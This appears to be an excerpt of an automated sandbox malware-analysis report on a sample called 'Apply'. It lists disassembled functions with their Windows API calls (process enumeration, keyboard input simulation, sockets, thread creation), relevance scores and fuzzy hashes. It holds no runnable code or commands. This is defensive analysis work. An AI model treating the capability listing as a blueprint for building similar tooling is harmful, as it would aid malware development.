ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0C77
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0C8F
CLSIDFromProgID.OLE32(?,?,00000000,008EDC2C,000000FF,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0CB4
_memcmp.LIBVCRUNTIME ref: 008B0CD5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: bb1099f413acee078527a7db34b007ac48692979823a6ed05a11170dd47cdc4e
Instruction ID: 2a5b5df03a8a67dc39cbce3baddfdce65fe68d97b39e4cf3f9bdc88f69053e1d
Opcode Fuzzy Hash: bb1099f413acee078527a7db34b007ac48692979823a6ed05a11170dd47cdc4e
Instruction Fuzzy Hash: C081E871A00109EFCB04DF94C994EEEBBB9FF89315F204558E506EB251DB71AE09CB61

Function 008DAE03 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008DAE33
Process32FirstW.KERNEL32(00000000,?), ref: 008DAE41

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Process32NextW.KERNEL32(00000000,?), ref: 008DAF23
CloseHandle.KERNEL32(00000000), ref: 008DAF32

Part of subcall function 0086E224: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00893B5C,?), ref: 0086E24E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 5faa8040867228d6a0e2cb99e5a10bfb11c489a35f22735bd43a750eafff9214
Instruction ID: d3244ae194276ddf8e9208b078e78291f61f09680b1d274cee90557d72fc1f80
Opcode Fuzzy Hash: 5faa8040867228d6a0e2cb99e5a10bfb11c489a35f22735bd43a750eafff9214
Instruction Fuzzy Hash: CD51F9B15083419FC714EF28D886A5BBBE8FF89714F40491DF995D7291EB30D909CB92

Function 008916E1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00891810

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c4e4d71bc6c4cc80d9669cd9c0d2a102f460b94f4154067bf798f5f5daf5cfe
Instruction ID: 77ef00396b725669c338058ef37f9561dbe35b09b2b34bbe9a0ff4ce4ba59810
Opcode Fuzzy Hash: 1c4e4d71bc6c4cc80d9669cd9c0d2a102f460b94f4154067bf798f5f5daf5cfe
Instruction Fuzzy Hash: F9411731A09607BADF217EFD8C89A7E3BA5FF02770F1C4624F429E6191E63488419363

Function 008D225D Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 008D2284
WSAGetLastError.WSOCK32 ref: 008D2292
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008D2311
WSAGetLastError.WSOCK32 ref: 008D231B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 72d044952f3799712c3c2bb71672201f9891c621ec85274667dd35434b592fd2
Instruction ID: d48cfc2f646d1227fa32c5e725af353b0eb739ba283fd2641568fb9524ab9032
Opcode Fuzzy Hash: 72d044952f3799712c3c2bb71672201f9891c621ec85274667dd35434b592fd2
Instruction Fuzzy Hash: FB418A35600300AFE720AF28C886F2A77A5FB14718F54C59DF91A9F392D676ED428B91

Function 008E69D1 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008E6A3B
ScreenToClient.USER32(?,?), ref: 008E6A6E
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008E6ADB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: fbd80d232fa846dae72e7a3a1d4ba3aa9d3ad9406df65c5f7736164000ed78f2
Instruction ID: 0898cdb40e6fc6230e7e48e720cf5dfc694e18645f2004e281ded33f6e8c757f
Opcode Fuzzy Hash: fbd80d232fa846dae72e7a3a1d4ba3aa9d3ad9406df65c5f7736164000ed78f2
Instruction Fuzzy Hash: D1516234900249EFCF14CF55C9809AE7BB6FF96360F108169F855DB290E730AD91CB90

Function 0088B76F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed857308a740759f81980cce484b9e33f77ae2d94f4b6260ace311908e55dc46
Instruction ID: 2875e2c9e779e47b4d6b9457a425336fbb758945b21bc4a156e75aa76e79d1c5
Opcode Fuzzy Hash: ed857308a740759f81980cce484b9e33f77ae2d94f4b6260ace311908e55dc46
Instruction Fuzzy Hash: A641D471A40718AFE724BF7CC841BAABBA9FFC8710F20452AF611DB691D771A9018781

Function 008BB158 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 008BB1AD
SetKeyboardState.USER32(00000080), ref: 008BB1C9
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 008BB237
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 008BB289

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9bc5681deb7667877d02b3b656221c64cfa2f04c025305aa6e7faf4ba4562237
Instruction ID: 626d41f70b4259b9ad1dc167f4b106b0f4bdd74073215415a633ad5a8610fb30
Opcode Fuzzy Hash: 9bc5681deb7667877d02b3b656221c64cfa2f04c025305aa6e7faf4ba4562237
Instruction Fuzzy Hash: FB310630A40248AEFF358F689C057FEBBA5FF55310F08421AE495D63E1C7F49A858792

Function 008E5A81 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 008E5B12
GetWindowLongW.USER32(?,000000F0), ref: 008E5B35
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E5B42
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008E5B68

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: fcbafcf80b92610a0f33ae3492d45f88d30569666572d87b17937c2d2df9b77f
Instruction ID: 6aadc9343e63cb328c2d2bb5ee84d6425953f48e2a2c11dd747bc0235e70ccf4
Opcode Fuzzy Hash: fcbafcf80b92610a0f33ae3492d45f88d30569666572d87b17937c2d2df9b77f
Instruction Fuzzy Hash: 4D31C334A55A8CBFEB349F56CC85BE93765FB46328F184112FA11D71E1C7705980DB81

Function 008BB29D Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 008BB2F2
SetKeyboardState.USER32(00000080,?,00008000), ref: 008BB30E
PostMessageW.USER32(00000000,00000101,00000000), ref: 008BB375
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 008BB3C7

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2875e43ac87d2c35d46255740cf3b5699352a3ff620d6808697a6f27628596ef
Instruction ID: 793ea01bb870567ea3e49bacfd16ba6da140bb28c8eb993d76e3154e2373d8e1
Opcode Fuzzy Hash: 2875e43ac87d2c35d46255740cf3b5699352a3ff620d6808697a6f27628596ef
Instruction Fuzzy Hash: 2F31F470940348EEEF348A658814BFEBBE5FF4D324F04421AE485D63D1C3B48A458B92

Function 008BE5D6 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919

_wcslen.LIBCMT ref: 008BE60C
_wcslen.LIBCMT ref: 008BE623
_wcslen.LIBCMT ref: 008BE64E
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 008BE659

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 3e227b11d2816a4b4ab1d4955901eaaf13b1811803356a174d1ff6da173ba884
Instruction ID: e1f4a28f32efb7c8e419e573c4e75e33ebb41470d6e251eb2306e647814065ea
Opcode Fuzzy Hash: 3e227b11d2816a4b4ab1d4955901eaaf13b1811803356a174d1ff6da173ba884
Instruction Fuzzy Hash: EA214171940214AFCB119FA8D982BEEB7F8FF66754F144065E808EB345D7709E41CBA2

Function 008E96B5 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

GetCursorPos.USER32(?), ref: 008E96ED
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008A7D21,?,?,?,?,?), ref: 008E9702
GetCursorPos.USER32(?), ref: 008E974A
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008A7D21,?,?,?), ref: 008E9780

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: f69ac3a1122f86dcf5b3bb29b5e7b311353f443d975f2d0683ee8bfa9ba174f4
Instruction ID: f8776c24ace307b677b295d4657f654d1c20e540989f7aae240e0a91d81720fd
Opcode Fuzzy Hash: f69ac3a1122f86dcf5b3bb29b5e7b311353f443d975f2d0683ee8bfa9ba174f4
Instruction Fuzzy Hash: 6921DE35510258FFCF258F59CC88EEA7BB9FB4A720F044165FA458B1A2C3719994EB60

Function 008BD8A6 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,008EDB28), ref: 008BD8E0
GetLastError.KERNEL32 ref: 008BD8EF
CreateDirectoryW.KERNEL32(?,00000000), ref: 008BD8FE
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008EDB28), ref: 008BD95B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2e7af78851d87ddd414ec4ea1bff635b688aebd409a9ebebfe6c2391c7e958a0
Instruction ID: 3f377946d67878f58affc4c17150848b99c2f3aa778f36ab6b81fcee76384227
Opcode Fuzzy Hash: 2e7af78851d87ddd414ec4ea1bff635b688aebd409a9ebebfe6c2391c7e958a0
Instruction Fuzzy Hash: 92217471508305EF8710DF28C88589A7FE4FE56369F104A19F4A9CB3A1EB30D94ACB53

Function 008E2F40 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 008E2FC8
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008E2FE2
SetWindowLongW.USER32(?,000000EC,00000000), ref: 008E2FF0
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008E2FFE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 709ea4969a68d1e3bab779b67338c9dc08bbbab906433881791d76ca2269f894
Instruction ID: d814c59ed3f8c4a54c725cd7707e37b011611ee6a39bcd5a4d3ebda0f776526a
Opcode Fuzzy Hash: 709ea4969a68d1e3bab779b67338c9dc08bbbab906433881791d76ca2269f894
Instruction Fuzzy Hash: 7321D331204691AFD7149B15CC55FAABBA9FF86324F148158F82ACB2D2CB71EC46CBD1

Function 008B2109 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 008B2129
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B213B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B2151
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B216C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
Instruction ID: d9e3766549f646887b8b6da66096e0e46a419c2fff08f12a753bde85de036e77
Opcode Fuzzy Hash: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
Instruction Fuzzy Hash: 1711F77A901218FFEB119BA8CD85FDDBBB8FB48750F200091EA11B72A4D6716E11DB94

Function 008EA5DF Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

GetClientRect.USER32(?,?), ref: 008EA61D
GetCursorPos.USER32(?), ref: 008EA627
ScreenToClient.USER32(?,?), ref: 008EA632
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 008EA666

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: b3935cba55b8c95e22928b44bf918dd034f849735ac64b26feaa3418114dc6a9
Instruction ID: ef32e5baf79812cfd1438cf5c3938e482a3902c40eebe9c2ef36146b034d9f28
Opcode Fuzzy Hash: b3935cba55b8c95e22928b44bf918dd034f849735ac64b26feaa3418114dc6a9
Instruction Fuzzy Hash: 2A115E71900199ABDF14DFA9D8859EE7BB8FB16700F140461F912E7160D770FE85CBA2

Function 008BE817 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008BE83E
MessageBoxW.USER32(?,?,?,?), ref: 008BE871
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008BE887
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008BE88E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 08e6ce5139106c3fc8f2e0b4a346d03128b035f5874850767b634787a7894630
Instruction ID: 50c42fae9df189b8e02413abe93c4f09a89a877f50a029d5a41332924c0f9869
Opcode Fuzzy Hash: 08e6ce5139106c3fc8f2e0b4a346d03128b035f5874850767b634787a7894630
Instruction Fuzzy Hash: CD11E176914259BFCB11DFA89C44ACA7FA8FB45320F044265F824E7390D6B4890497E2

Function 0087D51C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0087D349,00000000,00000004,00000000), ref: 0087D568
GetLastError.KERNEL32 ref: 0087D574
__dosmaperr.LIBCMT ref: 0087D57B
ResumeThread.KERNEL32(00000000), ref: 0087D599

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: c52c86994235731838ee9c37d789a3bd7b87c9fc434af4db9736ac7e860dc1dd
Instruction ID: b76e3ec4086978aa43a76bb66dbcd36ae8b289fd54dda43a0b4dc9889b6c243d
Opcode Fuzzy Hash: c52c86994235731838ee9c37d789a3bd7b87c9fc434af4db9736ac7e860dc1dd
Instruction Fuzzy Hash: D001C072405318ABCB206FA9DC49AAA7B79FF81734F108219F928CA1D4DB70C804C7A2

Function 008566CB Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00856709
GetStockObject.GDI32(00000011), ref: 0085671D
SendMessageW.USER32(00000000,00000030,00000000), ref: 00856727

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5ef19afc57ebead51748b2e07f037233a33e206e71617904a88868b9b8fe9863
Instruction ID: 7f225e4b091897894c87ef6caf0e605a7926ae0a6f8edb402a465d11e03615e5
Opcode Fuzzy Hash: 5ef19afc57ebead51748b2e07f037233a33e206e71617904a88868b9b8fe9863
Instruction Fuzzy Hash: 6E11ADB2101649BFDF124F949C94EEABBA9FF0C399F444205FE009A110E731DC64ABA0

Function 008833C3 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue), ref: 008833F5
GetLastError.KERNEL32(?,0088336A,00000364,00000000,00000000,00000000,?,008835DB,00000006,FlsSetValue,008F3268,FlsSetValue,00000000,00000364,?,00883196), ref: 00883401
